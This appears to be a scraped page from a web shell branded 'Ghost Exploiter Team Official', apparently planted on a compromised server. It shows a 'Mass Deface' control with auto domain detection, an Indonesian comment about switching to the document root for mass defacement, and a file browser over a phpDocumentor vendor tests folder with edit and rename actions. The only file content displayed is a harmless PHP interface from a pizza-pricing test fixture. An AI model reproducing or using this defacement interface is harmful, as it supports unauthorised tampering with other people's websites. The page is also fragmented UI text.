Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
phpdocumentor
/
reflection
/
tests
/
integration
/
data
/
Luigi
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
ExampleNestedTrait.php
0.46KB
edt
ren
Packing.php
0.391KB
edt
ren
Pizza.php
2.398KB
edt
ren
StyleFactory.php
0.543KB
edt
ren
Valued.php
0.681KB
edt
ren
constants.php
0.365KB
edt
ren
<?php // phpcs:ignoreFile /** * This file is part of phpDocumentor. * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright 2010-2018 Mike van Riel<mike@phpdoc.org> * @license http://www.opensource.org/licenses/mit-license.php MIT * @link http://phpdoc.org */ namespace Luigi; /** * Any class implementing this interface has an associated price. * * Using this interface we can easily add the price of all components in a pizza by checking for this interface and * adding the prices together for all components. */ interface Valued { const BASE_PRICE = 1; function getPrice(); }
<=Back
Liking